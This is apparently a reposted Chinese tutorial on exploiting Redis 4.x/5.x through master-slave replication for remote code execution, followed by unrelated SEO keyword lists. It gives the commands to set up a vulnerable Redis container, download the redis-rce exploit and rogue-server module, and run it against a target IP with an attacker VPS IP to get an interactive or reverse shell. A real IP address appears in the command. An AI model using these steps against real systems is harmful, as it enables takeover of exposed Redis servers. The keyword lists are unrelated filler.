Redis基于主从复制的RCE 4.x/5.x怎么实现
发表于:2025-02-04 作者:千家信息网编辑
千家信息网最后更新 2025年02月04日,这篇文章主要讲解了"Redis基于主从复制的RCE 4.x/5.x怎么实现",文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习"Redis基于主从复制的RCE
千家信息网最后更新 2025年02月04日Redis基于主从复制的RCE 4.x/5.x怎么实现
这篇文章主要讲解了"Redis基于主从复制的RCE 4.x/5.x怎么实现",文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习"Redis基于主从复制的RCE 4.x/5.x怎么实现"吧!
首先拉取一个5.0镜像
docker search redis5.0 //查找镜像docker pull damonevking/redis5.0 //拉取下图第三个镜像
0x02 运行环境
运行容器
docker run -p 6379:6379 -d damonevking/redis5.0 redis-server //映射端口并运行容器
访问你的ip+6379端口,如下图则说明搭建成功
0x03 漏洞利用
git clone https://github.com/Ridter/redis-rce.git //下载漏洞利用脚本
注意,这里少一个.so的文件,到https://github.com/n0b0dyCN/redis-rogue-server下载并放到和redis-rce.py同一目录下,然后执行如下命令:
python3 redis-rce.py -r 136.244.70.243(目标ip) -L 136.244.70.243(自己的vps) -f exp.so //ip就不打码了,师傅们不要搞我
需要注意,这里的-r后面是目标的ip,而-L后面则是你执行脚本的vps的ip
在此处:i为交互式shell,r为反弹shell,根据自己的需要选择就可以了
感谢各位的阅读,以上就是"Redis基于主从复制的RCE 4.x/5.x怎么实现"的内容了,经过本文的学习后,相信大家对Redis基于主从复制的RCE 4.x/5.x怎么实现这一问题有了更深刻的体会,具体使用情况还需要大家实践验证。这里是,小编将为大家推送更多相关知识点的文章,欢迎关注!
主从
镜像
学习
运行
内容
容器
漏洞
目标
端口
脚本
成功
三个
下图
交互式
命令
就是
师傅
思路
情况
文件
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
深圳市伊斯凯网络技术有限公司
我与网络安全征文700
济南计算机网络技术老师
虚拟机win7 打印服务器
校长 网络安全开幕式致辞
软件开发每年招聘高峰
安徽舒伴互联网科技有限公司官网
软件开发工程师郑州工资
服务器还原电脑后
网络安全的风险的培训
服务器怎么用不了合成表
iris软件开发
大连工业大学数据库导航总表
学生学籍管理系统数据库
网络安全论文一千字
a1数据库
昆明fil服务器加盟
软件开发 mcu
在数字资源中中文数据库有哪些
浙江现代软件开发报价表
北京地铁 网络安全
网络技术专业需要配备的品质
自动外汇软件开发
呼和浩特统计年鉴数据库官网
北青客邻网络技术
mfc 数据库显示
与文件相比 数据库的特点
自动配料软件开发一般用什么
软件开发和芯片验证
国务院网络安全局